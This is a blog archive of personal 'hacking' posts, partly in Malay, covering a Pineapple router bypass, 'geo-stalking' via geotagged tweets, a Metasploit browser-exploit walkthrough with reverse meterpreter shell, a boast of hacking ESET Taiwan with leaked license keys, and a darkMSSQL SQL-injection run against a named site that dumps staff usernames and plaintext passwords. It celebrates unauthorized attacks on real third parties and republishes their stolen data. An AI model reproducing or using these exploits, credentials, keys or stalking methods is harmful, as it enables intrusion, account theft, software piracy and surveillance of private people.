Category Archives: hacking

Wifi Pineapple Mark V MR3020 – Bypass verify_pineapple LED pattern

wrong pattern entered during verify pineapple.

wrong pattern entered during verify pineapple.

Recently, I have a cool weekend project to do at home. Kinda spending a good time with my gadgets. 😀 I decided to install Wifi Pineapple Mark 5 version 2.2.0 on TP-Link MR3020 version 1.9. Its a straight forward step and you can follow that tutorial on my personal wiki at wiki.khairulazam.net.

After the installation finished, you need to go through the pineapple security measure as a part of setting up pineapple for the first time.

You need to select the correct pattern on that page to match with the blinking LED on your device. But… You know. Shit happen. Maybe because you installing the firmware on different hardware. 🙁

So, if you also have and facing the same problem, its okay. With a help from Mr. Fikri Fadzil, lets bypass the pattern verification. >_<

First, power off you device, which in my case, I’m using TP-Link MR3020.

After that, unplug the USB pendrive that contain pineapple firmware and plug in it to your computer. I use Ubuntu Desktop to make this step easier.

Go to this directory:

* /media/a7ac8712-5a08-49da-b9e1-2ede31828bda/ may be different as yours. take note what your USB drive mounted on your OS

And edit this file:

Go to line 199. Or search for keyword “array_search” in this “welcome.inc.php” file.

Edit the code from this:

to this:

Save this code. Unmount/eject your USB pendrive and plug in on your MR3020 back.

After that, just power on your device, and try to go through the verify pattern step back again. At this time, it will accept any pattern you like.

Then proceed to the next step. Happy hacking! 🙂

Geo-stalking with Bing Maps and the Twitter Maps App

Geo/Social stalking is fun. Bing Maps has the ability to add various “apps” to the map to enhance your bind maps experience. One of the cooler ones is the Twitter Map app which lets you map geotagged tweets.

Let’s start with somewhere fun, like at German-Malaysian Institute (GMi), Bangi and see who’s tweeting around there.. ;D

First, open www.bing.com/maps/

Then, you can change the view to Aerial View for more nicer look. ;D
You may change to other place you want to view e.g. your home, college, workplace

Then, select Map apps options..

Then, select Twitter Maps apps..

Wait for a while for the page to reload the necessary thing (loading tweet around the map you currently viewing) 

 Aaannndd.. Ta-Da! Happy Stalking. ;D

Thanks to carnal0wnage for this tips. 😉

Metasploit?

Korang pernah tak teringin nak guna metasploit?
Korang penah tak dapat buat satu session menggunakan metasploit?
Aku tak pernah dapat gune metasploit ni.. 🙁

Tapi aku tak pernah mengalah(kecuali perkara2 tertentu)..
Akhirnya aku dapat jugak guna..
Dan dapat jugak access ke PC tu.. 🙂

So, meh aku kongsikan macam mana aku dapat buat benda ni..
Pertama, korang install dulu Metasploit.
Tak kesahlah versi apa2 pun.
Nanti boleh update.

Lepas dah install, jangan lupa untuk update.
Supaya korang dapat menggunakan lebih banyak sumber exploit kelak.

Lepas dan install & update,
korang run kan Metasploit.
Run yang console punya tau.
Sebab orang selalu cakap,
yang pakai CLI ni lagi efektif.
So, korang patut cuba.. 😉

Lepas dah run,
korang taipkan macam ni..

use windows/browser/ms06_001_wmf_setabortproc

Itu adalah exploit yang kita akan gunakan..
Exploit ni dia menggunakan browser(IE) untuk menjalankan kerja2 nya..

Lepas dah setkan exploit korang,
setkan pulak payload korang..

set payload windows/meterpreter/reverse_tcp

Lepas dah setkan payload tu,
korang assignkan/isikan apa2 yang patut macam LHOST, LPORT, SRVHOST, URL & lain2 yang berkenaan..

set SRVHOST 192.168.56.101
set LHOST 192.168.56.101

Lepas dah setkan suma,
taipkan show options untuk tengok balik semua setting2 korang tu..
Ngam ke tak. Apa yang dia require tu korang isikan la kalo tak isi lagi..

Lepas dah setel semua,
korang taipkan exploit..
Dia akan keluar lebih kurang macam ni..

[*] Exploit running as background job.
msf exploit(ms06_001_wmf_setabortproc) >
[-] Handler failed to bind to 192.168.56.101:4444
[*] Started reverse handler on 0.0.0.0:4444
[*] Using URL: http://192.168.56.101:8080/asjKYXWBb3z
[*] Server started.
[*] Sending exploit to 192.168.56.102:1274...
[*] Sending stage (748032 bytes) to 192.168.56.102

So, korang kenalah buatkan mangsa korang tu pergi ke URL http://192.168.56.101:8080/asjKYXWBb3z tu..
Barulah menjadi..
Kalo tak memang sampai bila2 lah tak jalan exploit & payload tu.. :p

Lepas korang dah bagi mangsa korang bukak URL tu,
korang akan dapat tengok kat msfconsole korang tu flow yang exploit sedang dijalankan ke mangsa yang bukak URL tu..

Kalo exploit korang menjadi,
dia akan keluar lebih kurang macam ni..

[*] Meterpreter session 1 opened (192.168.56.101:4444 -> 192.168.56.102:1275) at 2010-08-07 00:57:21 +0800

Haa.. Dah kena! Korang dah ada 1 session ngan dia..
Bole la korang upload/download dan macam2 lagi kat PC dia..
Meh kita tengok..

msf exploit(ms06_001_wmf_setabortproc) > sessions -l

Active sessions
===============

Id  Type         Information                         Connection
--  ----         -----------                         ----------
1   meterpreter  4NGRY-LE0P4RDzer0 @ 4NGRY-LE0P4RD  192.168.56.101:4444 -> 192.168.56.102:1275

msf exploit(ms06_001_wmf_setabortproc) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: C:Documents and Settingszer0Desktop
===============================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:17 +0800  .
40777/rwxrwxrwx   0        dir   2010-06-05 15:09:29 +0800  ..
100777/rwxrwxrwx  690176   fil   2009-10-28 10:56:12 +0800  .NET Version Detector 2010.exe
40777/rwxrwxrwx   0        dir   2010-07-21 19:15:19 +0800  Core_impact4
40777/rwxrwxrwx   0        dir   2010-06-05 16:37:23 +0800  Desktop
100666/rw-rw-rw-  1677     fil   2010-06-26 04:14:53 +0800  Process Hacker.lnk
100666/rw-rw-rw-  626      fil   2010-06-05 15:16:34 +0800  mirc.lnk
40777/rwxrwxrwx   0        dir   2010-06-05 14:54:58 +0800  nc111nt
100777/rwxrwxrwx  1261193  fil   2010-03-29 16:40:18 +0800  processhacker-1.11-setup.exe

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 08:00:27:af:62:54
IP Address  : 192.168.56.102
Netmask     : 255.255.255.0

Yeay! Saya dah berjaya. Haha..
Benda simple je kot..
Saya rasa orang lain tak pandang pun kalo saya dapat buat macam ni.. 🙁

Anyway, selamat mencuba la ye.
Ada pape, bole tanya saya.. 🙂

ESET Nod32 Taiwan pwn! :)

Today, another Nod32 website has been pwnd/hacked..

Here is the screenshot :

ESET NOD32 Taiwan

So, in this peaceful day, i have something give for you all.. 🙂

new_key=J112-mgf7f4r8u   org_key=J102-e4rdefyr5
new_key=J112-r6w87jwy2   org_key=J102-e5xzgsrfw
new_key=J112-spgbw2j5w   org_key=J102-e7tj8p3ww
new_key=J112-p94sfm3yt   org_key=J102-e83dteggq
new_key=J112-tm6v4yttt   org_key=J102-e9wwn8h4f
new_key=J112-uwwqk7vjy   org_key=J102-eax58prwg
new_key=J112-syw3wr7wp   org_key=J102-eb5c58mkj
new_key=J112-e4u6emunx   org_key=J102-ebcekvqed
new_key=J112-tsaudq3cy   org_key=J102-ecnf7u3ue
new_key=J112-ycbmr376x   org_key=J102-ecnhq856w

Brand new NOD32 key.. ahaha..

This thing really annoying me..

Why?

Because their website security is really low..

They dont manage their db very well..

I just wondering why they put important files like serial key, password, username, and others important files in their database without encrypting it..

Like some of the db that i found, mostly they dont encrypt their password..

Sound bad to me.. 🙂

Anyway, see you next time!

Assalamualaikum.. 🙂

darkMSSQL tutorial

Hari ini aku nak tunjukkan macam mana cara menggunakan darkMSSQL.py…

benda ni digunakan untuk MSSQL database yang ade error..
Aku jarang jumpa database MSSQL yang ada error..
Kalau jumpa pun, nasib2 je..

Tu agaknya pemalas sangat la tu Web Admin dia..
Server GMi pun pakai server jenis MSSQL jgk..
Oppss! Sori! :p

Apa2 pun, jom kita tengok macam mana aku gunakan darkMSSQL.py ni..

darkMSSQL.py journey… begin…


-h command (help)
Usage: ./darkMSSQL.py [options]                       rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: --info    Gets MySQL server configuration only.
Define: --dbs     Shows all databases user has access too.
Define: --schema  Enumerate Information_schema Database.
Define: --dump    Extract information from a Database, Table and Column.
Define: --insert  Insert data into specified db, table and column(s).

Required:
Define: -u        URL "www.site.com/news.asp?id=2" or "www.site.com/index.asp?id=news'"

Mode dump and schema options:
Define: -D        "database_name"
Define: -T        "table_name"
Define: -C        "column_name,column_name..."

Optional:
Define: -p        "127.0.0.1:80 or proxy.txt"
Define: -o        "ouput_file_name.txt"        Default is darkMSSQLlog.txt
Define: -r        "-r 20" this will make the script resume at row 20 during dumping
Define: --cookie  "cookie_file.txt"
Define: --debug   Prints debug info to terminal.

Ex: ./darkMSSQL.py --info -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --dbs -u "www.site.com/news.asp?id=2"
Ex: ./darkMSSQL.py --schema -u "www.site.com/news.asp?id=2" -D dbname
Ex: ./darkMSSQL.py --dump -u "www.site.com/news.asp?id=2" -D dbname -T tablename -C username,password
Ex: ./darkMSSQL.py -u "www.site.com/news.asp?news=article'" -D dbname -T table -C user,pass --insert -D dbname -T table -C darkuser,darkpass

[email protected]:~/Desktop$ python darkMSSQL.py --info -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:25
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying information about MSSQL host!

[+] @@VERSION: Microsoft SQL Server  2000 - 8.00.2039 (Intel X86)
May  3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

[+] USER: mylittletail_usr
[+] DB_NAME(): mylittletail_db
[+] HOST_NAME(): SERVER439

[+] Script detected Microsoft SQL Version:  2000
[+] Checking to see if we can view password hashs... Nope!

[-] [00:19:26]
[-] Total URL Requests 5
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dbs -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL: http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:19:39
[+] Cookie: None
[-] Proxy Not Given
[+] Displaying list of all databases on MSSQL host!

[0] mylittletail_db
[1] master
[2] tempdb
[3] model
[4] msdb
[5] pubs
[6] Northwind
[7] lotteryuk_db
[8] mylittletail_db
[9] sailor_db

[-] 00:19:41
[-] Total URL Requests 11
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --schema -D mylittletail_db -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:31:03
[+] Cookie: None
[+] Proxy Not Given
[+] Displaying tables inside DB: mylittletail_db

[0] addon
[1] category
[2] country
[3] delivery
[4] discount
[5] dtproperties
[6] featured_category
[7] featured_item
[8] featured_maincategory
[9] item_packages
[10] item_questions
[11] items
[12] items_addon
[13] items_also
[14] main_items
[15] member
[16] message
[17] millkak
[18] newsletter_counter
[19] newsletter_log
[20] newsletter_master
[21] order
[22] order_item
[23] subcategory
[24] sysconstraints
[25] syssegments
[26] t_jiaozhu
[27] temp_order
[28] temp_order_id
[29] ticketing
[30] uploadform
[31] userlog
[32] users

[-] [00:31:09]
[-] Total URL Requests 34
[-] Done

Don't forget to check darkMSSQLlog.txt

[email protected]:~/Desktop$ python darkMSSQL.py --dump -D mylittletail_db -T users -C username,password -u www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003

|------------------------------------------------|
| rsauron[@]gmail[dot]com                   v2.0 |
|   10/2008      darkMSSQL.py                    |
|      -MSSQL Error Based Database Enumeration   |
|      -MSSQL Server Information Enumeration     |
|      -MSSQL Data Extractor                     |
| Usage: darkMSSQL.py [options]                  |
|  [Public Beta]      -h help       darkc0de.com |
|------------------------------------------------|

[+] URL:http://www.mylittletail.com/mylittletail/web/sub_box_ID1.asp?item_id=2003
[+] 00:27:52
[+] Cookie: None
[+] Proxy Not Given
[0] 20admin08:72hu1ge9 admin
[1] yennee08:01yen04nee admin
[2] jolen18e:dedica18 staff
[3] jason:11jas37on5 admin
[4] katrina03:031983 staff
[5] zack09:20gift09 staff
[6] 3sales69:3moneytail69 staff

[-] [00:27:54]
[-] Total URL Requests 8
[-] Done

Don't forget to check darkMSSQLlog.txt

korang paham x bnd ni?

klu x paham, bole tny aku..

bukannya susah sgt pn.. 😀

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! 🙂

WiredEquivalentPrivacy 128-bit encryption key pwnd!

WEP 128-bit.. a long encryption key..
how can i get this key?
by using aireplay-ng – injecting the probe and replay the packet..
also dont forget to dump it! 🙂


hurmm.. not really good to secure your network..
although it is 128-bit key, still can get the key..

till next time dude!